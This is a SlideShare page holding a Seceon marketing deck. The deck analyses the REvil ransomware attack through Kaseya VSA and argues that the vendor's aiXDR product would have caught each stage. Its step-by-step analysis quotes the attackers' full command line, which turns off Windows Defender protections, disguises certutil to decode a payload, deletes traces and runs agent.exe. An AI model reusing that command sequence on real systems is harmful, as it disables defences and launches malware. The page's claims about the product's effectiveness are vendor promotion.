SlideShare a Scribd company logo

How Seceon could have stopped the Ransomware roll over Kaseya.pptx

Download as PPTX, PDF
CompanySeceon
CompanySeceon

Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. Call Us: +1 (978)-923-0040

Business
1 of 7
How Seceon could have stopped the Ransomware roll over Kaseya. The attack and ways will keep on changing, one of the most Recent attack that Kaseya faced is the result of what & where industry is missing in terms of Cybersecurity. The attack on Kaseya came in action a few days ago. The sudden attack emerged in a brutal way infecting around 1500 businesses worldwide as per the statement by Kaseya’s CEO. The names of infected companies are not yet out. The observed result of this attackswas seen with Swedish Coop supermarket which was forced to close. They are among one of the clients of these MSPs which were hacked and got infected with 2100 endpoints.
A $70 millions ransom was demanded for data backup. The REvil Ransomware gang is being considered responsible for this operation. It’s still a mystery whether REvil prepared this attack themselves or it was from any of their associates. Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. What is VSA, How it got compromised and Ransomware rolled over it.. VSA is a remote monitoring tool, a kind of remote access tool or RAT that allows to have the complete access of system or device it’s installed on, which helps IT Technicians to diagnose and fix problems remotely. Every organization doesn’t have resources to manage their infrastructure in house, so they outsource this as a task to MSP (Managed Service Provider). These MSPs often manage the system of hundreds of companies simultaneously. Kaseya is an MSP provider with VSA as a product it has its own prem version, which is run by the customer in their environment, this is typically needed by MSPs to manage all their client system and this was something that was off with Kaseya server that was used to manage lot of their clients. Having the access of this server will itself allow it to have the access of all clients associated with it. And this how it was compromised at initial. Soon after the attack rolled out all the VSA Server were advised to close. The operation was huge enough to infect the business, it was the mass ransomware unlike the ransomware that we know usually where organizations get infected with Ransomware and all system they get encrypt and are ask for ransom, here case was quite different where 100’s of organization around the world got encrypted simultaneously with the same ransomware campaign which was tunnelled during the software update in Kaseya, since from the inception it moved in a supply chain attack. It was a kind of compromise of Kaseya which was operated on VSA
server rather than any of their directory directly that we usually see in Ransomware. The VSA server was used to ransomware a lot of organizations in single click and this is what has happened at high level in it. How does it propagate? The scenario is like If there is a device using Kaseya’s agent to monitor all the device subjected to policy and that is connected to central server and that server is affected then the entire system connected with it is at higher risk, and this is how it propagated in the form of chain attack one after the other and affected 1000s of server. How did the initial compromise begin and aiXDR detection? As VSA server vulnerability was exploited, Seceon aiXDR can detect and remediate exploited vulnerabilities and zero day attack in very early stages. Here is the steps by steps analysis: 1.aiXDR monitors all inbound and outbound connections and in this case aiXDR should have detected a connection from Blacklisted IPs or from a prohibited country and automatically blocked that connection. 2.Once connection was made it was trying to download/upload agent.exe on the host , aiXDR can detect data exfiltration and in this case aiXDR should have blocked that connection so it can not download the agent.exe or transfers the data to external hosts. 3.Also when the host had agent.exe downloaded, it was doing a different type of scan to get access to another host – aiXDR should have detected those scans and automatically quarantined that host so it can not infect other hosts. 4.Following PowerShell command was launched by the C:Program Files (x86)Kaseya<ID>AgentMon.exe file of the Kaseya VSA platform. “C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set- MpPreference
-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe 5.As the AgentMon.exe starts its 1st process to execute the powershell command the aiXDR would have detected a new process started as AgentMon.exe from C:Program Files (x86)Kaseya 6.aiXDR detects if any protection service is disabled on the host as we can see in this case they were trying to disable protection services 7.aiXDR detects if any process is renamed as Masquerading as we can see in this case certutil.exe was renamed as cert.exe . What was the impact of this? The threat actor was able to manage execution of code that enabled them to search scripts that linked with Kaseya’s application to pull out certain procedures or agent updates. It was part of the functionality of the application to push out procedures through all managed agents. These agents run on the computer which is managed by this solution. They simply run the script to all managed clients and that triggered a file copy and execution of script to all managed clients. This is how they ended by infecting all these systems. There were a couple of steps that were initiated step by step to make a complete successful attempt for attack but surprisingly it was never looked at and detected in between.
Approach after Infected ? There are always different indicators left on the system to know how it’s being compromised or not, here in this case it has been identified that logs have been cleared at multiple stages. The logs were gone and other types of logs inside the application database itself were deleted but still some logs were there to know what VSA server has put out to manage clients. These logs became a point to bring out the investigation of how the system was targeted from the VSA server. Few indications of Being Ransomware. Ransomware is coming out as a complete business model and the threat actors are making a lot of money out of it. Below are few indications mentioned below: • All files in the system get encrypted and left with a README file saying about ransom amount. It will change the file extension which is a clear indication of attack occurrence. • Some of the files they may or may not get encrypted this happen in the case where ransomware did not execute successfully i.e it gets executed partially. • Provisional execution that disables antivirus functionality such as Windows defender or other security layers. Brief About Seceon aiXDR Seceon aiXDR is highly effective, enriched with capability of machine learning, AI, Big data, Dynamic threat intel, strong correlation and in-depth analysis which easily allows to cut & throw the threat roots at very initial stage. The solution detects the threat origin whether it’s coming from Network, application, host or machine learning. It comes out with one of the most interesting feature to show anything and everything that was done to make the attack attempt and how Seceon solution stopped the way in between to make the
... environment secure with 360 degree Comprehensive visibility, Proactive Threat Detection, Auto stopping of Threat and breaches in Real time. The customer should always make sure that they are not just taking a solution which is problem specific, the solution should always be capable of saving the environment from all kinds of threat and malicious activity whether it is known or unknown. The Seceon aiXDR is a single all-in-one platform. That helps to eliminate the use of silos based solutions and delivers the effective essential result in Comprehensive manner. Diag. show the Seceon aiXDR approach “Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches” Best Cybersecurity ROI.
Contact Us Address -238 Littleton Road, Suite #206,Westford, MA 01886, USA Phone Number - +1 (978)-923-0040 Email Id - sales@seceon.com , info@seceon.com Website - https://www.seceon.com/ Twitter - https://twitter.com/Seceon_Inc

Recommended

Advanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackAdvanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the Haystack
EMC
 
Vulnerability Malware And Risk
Vulnerability Malware And RiskVulnerability Malware And Risk
Vulnerability Malware And Risk
Chandrashekhar B
 
Vulnerability , Malware and Risk
Vulnerability , Malware and RiskVulnerability , Malware and Risk
Vulnerability , Malware and Risk
SecPod Technologies
 
Escan advisory wannacry ransomware
Escan advisory wannacry ransomwareEscan advisory wannacry ransomware
Escan advisory wannacry ransomware
MicroWorld Software Services Pvt Ltd
 
Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?
ahanashrin
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat Ransomware
Ivanti
 
Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015
SLBdiensten
 
Web Security.pptx
Web Security.pptxWeb Security.pptx
Web Security.pptx
AnnMichelleDiaz
 

Recommended

Advanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackAdvanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the Haystack
EMC
 
Vulnerability Malware And Risk
Vulnerability Malware And RiskVulnerability Malware And Risk
Vulnerability Malware And Risk
Chandrashekhar B
 
Vulnerability , Malware and Risk
Vulnerability , Malware and RiskVulnerability , Malware and Risk
Vulnerability , Malware and Risk
SecPod Technologies
 
Escan advisory wannacry ransomware
Escan advisory wannacry ransomwareEscan advisory wannacry ransomware
Escan advisory wannacry ransomware
MicroWorld Software Services Pvt Ltd
 
Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?
ahanashrin
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat Ransomware
Ivanti
 
Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015
SLBdiensten
 
Web Security.pptx
Web Security.pptxWeb Security.pptx
Web Security.pptx
AnnMichelleDiaz
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
karthikvcyber
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Sysfore Technologies
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
Bunmi Sowande
 
What is ransomware?
What is ransomware?What is ransomware?
What is ransomware?
Milan Santana
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
APNIC
 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirusUltraUploader
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That Works
Brett L. Scott
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
CompanySeceon
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
Orbid
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...
Osama Salah
 
Security threats explained
Security threats explained Security threats explained
Security threats explained
Abhijeet Karve
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
IRJET Journal
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threads
Iaetsd Iaetsd
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
Satria Ady Pradana
 
NetWitness
NetWitnessNetWitness
NetWitness
TechBiz Forense Digital
 
Globally.docx
Globally.docxGlobally.docx
Globally.docx
GermanERuizCorrales
 
Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USA
CompanySeceon
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
CompanySeceon
 

More Related Content

Similar to How Seceon could have stopped the Ransomware roll over Kaseya.pptx

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
karthikvcyber
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Sysfore Technologies
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
Bunmi Sowande
 
What is ransomware?
What is ransomware?What is ransomware?
What is ransomware?
Milan Santana
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
APNIC
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That Works
Brett L. Scott
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
CompanySeceon
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
Orbid
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...
Osama Salah
 
Security threats explained
Security threats explained Security threats explained
Security threats explained
Abhijeet Karve
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
IRJET Journal
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threads
Iaetsd Iaetsd
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
Satria Ady Pradana
 
NetWitness
NetWitnessNetWitness
NetWitness
TechBiz Forense Digital
 
Globally.docx
Globally.docxGlobally.docx
Globally.docx
GermanERuizCorrales
 

Similar to How Seceon could have stopped the Ransomware roll over Kaseya.pptx (20)

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
 
What is ransomware?
What is ransomware?What is ransomware?
What is ransomware?
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirus
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That Works
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...
 
Security threats explained
Security threats explained Security threats explained
Security threats explained
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation Techniques
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threads
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Globally.docx
Globally.docxGlobally.docx
Globally.docx
 

More from CompanySeceon

Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USA
CompanySeceon
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
CompanySeceon
 
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptxThe Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
CompanySeceon
 
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptxSeceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
CompanySeceon
 
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
CompanySeceon
 
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptxThe Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
CompanySeceon
 
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptxLearnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
CompanySeceon
 
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptxSeceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
CompanySeceon
 
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptxSeceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
CompanySeceon
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
CompanySeceon
 
XDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptxXDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptx
CompanySeceon
 
Threat Intelligen.pptx
Threat Intelligen.pptxThreat Intelligen.pptx
Threat Intelligen.pptx
CompanySeceon
 
Cyber Security Solutions.pptx
Cyber Security Solutions.pptxCyber Security Solutions.pptx
Cyber Security Solutions.pptx
CompanySeceon
 
Threat Detection and Response.pptx
Threat Detection and Response.pptxThreat Detection and Response.pptx
Threat Detection and Response.pptx
CompanySeceon
 
What is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptxWhat is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptx
CompanySeceon
 
What is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdfWhat is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdf
CompanySeceon
 
Top Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptxTop Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptx
CompanySeceon
 
Open Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptxOpen Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptx
CompanySeceon
 
Cyber Security Company.pptx
Cyber Security Company.pptxCyber Security Company.pptx
Cyber Security Company.pptx
CompanySeceon
 
Ransomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptxRansomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptx
CompanySeceon
 

More from CompanySeceon (20)

Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USA
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
 
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptxThe Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
 
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptxSeceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
 
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
 
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptxThe Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
 
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptxLearnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
 
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptxSeceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
 
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptxSeceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
 
XDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptxXDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptx
 
Threat Intelligen.pptx
Threat Intelligen.pptxThreat Intelligen.pptx
Threat Intelligen.pptx
 
Cyber Security Solutions.pptx
Cyber Security Solutions.pptxCyber Security Solutions.pptx
Cyber Security Solutions.pptx
 
Threat Detection and Response.pptx
Threat Detection and Response.pptxThreat Detection and Response.pptx
Threat Detection and Response.pptx
 
What is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptxWhat is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptx
 
What is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdfWhat is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdf
 
Top Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptxTop Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptx
 
Open Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptxOpen Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptx
 
Cyber Security Company.pptx
Cyber Security Company.pptxCyber Security Company.pptx
Cyber Security Company.pptx
 
Ransomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptxRansomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptx
 

Recently uploaded

Top mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptxTop mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptx
JeremyPeirce1
 
Building Your Employer Brand with Social Media
Building Your Employer Brand with Social MediaBuilding Your Employer Brand with Social Media
Building Your Employer Brand with Social Media
LuanWise
 
In the Adani-Hindenburg case, what is SEBI investigating.pptx
In the Adani-Hindenburg case, what is SEBI investigating.pptxIn the Adani-Hindenburg case, what is SEBI investigating.pptx
In the Adani-Hindenburg case, what is SEBI investigating.pptx
Adani case
 
Digital Transformation and IT Strategy Toolkit and Templates
Digital Transformation and IT Strategy Toolkit and TemplatesDigital Transformation and IT Strategy Toolkit and Templates
Digital Transformation and IT Strategy Toolkit and Templates
Aurelien Domont, MBA
 
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
bosssp10
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
techboxsqauremedia
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Holger Mueller
 
Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431
ecamare2
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
Aggregage
 
Auditing study material for b.com final year students
Auditing study material for b.com final year studentsAuditing study material for b.com final year students
Auditing study material for b.com final year students
narasimhamurthyh4
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
